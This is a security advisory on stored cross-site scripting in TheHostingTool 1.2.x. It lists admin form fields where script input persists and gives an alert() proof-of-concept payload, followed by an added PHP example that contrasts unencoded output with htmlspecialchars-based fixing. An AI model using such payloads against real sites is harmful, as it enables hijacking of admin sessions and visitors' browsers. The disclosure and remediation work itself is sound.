TheHostingTool version 1.2.x suffers from multiple cross site scripting vulnerabilities.
#Title : TheHostingTool 1.2.x Multiple Cross Site Scripting
#Author : DevilScreaM
#Date : 7 December 2013
#Category : Web Applications
#Vendor : http://thehostingtool.com/
#Version : 1.2.x
#Type : PHP
#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber
#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |
#Tested : Mozilla, Chrome, Opera -> Windows & Linux
#Vulnerability : Cross Site Scripting
POC & Exploit
XSS 1
http://127.0.0.1/admin/?page=servers&sub=add
At Column "Name" input your XSS
View Your XSS at
http://127.0.0.1/admin/?page=servers&sub=view
http://127.0.0.1/admin/?page=servers&sub=test
XSS 2
http://127.0.0.1/admin/?page=staff&sub=add
At Column "Username" input your XSS
View Your XSS At
http://127.0.0.1/admin/?page=staff&sub=edit
XSS 3
1. Create Category at http://127.0.0.1/admin/?page=kb&sub=cat
2. After Create Category, Create Article At http://127.0.0.1/admin/?page=kb&sub=art
3. At Column "Name" or "Article Name" input your XSS
Example <script>alert('DevilScreaM')</script>
4. View Your XSS at
http://127.0.0.1/support/
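All three findings above share one pattern: a value typed into an admin form field (server "Name", staff "Username", knowledge base category or article "Name") is stored and later echoed into a page without output encoding, so the injected markup runs in the browser of every admin or visitor who views the listing. The following PHP is an added illustration of that pattern and its fix; it is not TheHostingTool's own code, and the row layout, column name and validation rule are assumptions made for the example, not the application's real schema.

```php
<?php
// Added example, not TheHostingTool code: stored admin-form value rendered
// into HTML. The array key 'name' and the <td> context are assumptions.

declare(strict_types=1);

// Constructed sample row, standing in for a record the list pages read back
// from the database. The payload is the one quoted in the advisory.
$row = ['name' => "<script>alert('DevilScreaM')</script>"];

// Vulnerable rendering pattern: the raw stored value is concatenated into the
// markup, so the browser parses and executes the injected script.
function renderVulnerable(array $row): string
{
    return '<td>' . $row['name'] . '</td>';
}

// Hardened rendering: encode for the HTML text context at the point of output.
// ENT_QUOTES also encodes ' and " so the same helper is safe inside attribute
// values; ENT_SUBSTITUTE avoids returning an empty string on invalid UTF-8.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function renderHardened(array $row): string
{
    return '<td>' . h($row['name']) . '</td>';
}

// Optional second layer for fields that are meant to be short identifiers
// (server or staff names): enforce a length and a character whitelist at
// input time. Assumed rule for the example; it complements, and does not
// replace, the output encoding above.
function validateName(string $name): bool
{
    return $name !== ''
        && strlen($name) <= 64
        && preg_match('/^[\p{L}\p{N} ._-]+$/u', $name) === 1;
}

echo 'vulnerable: ' . renderVulnerable($row) . PHP_EOL;
echo 'hardened:   ' . renderHardened($row) . PHP_EOL;
echo 'validateName: ' . (validateName($row['name']) ? 'accepted' : 'rejected') . PHP_EOL;
```

Run it with `php` from the command line: the first line reproduces the executable markup, the second shows the same payload with `<`, `>` and quotes encoded so it is displayed as literal text, and the validation rule rejects the value outright. Applying `h()` at every place the stored name is echoed (the view, test and edit pages listed above, and the public /support/ page) is the fix; filtering only on the add form would leave existing rows and any other write path unprotected.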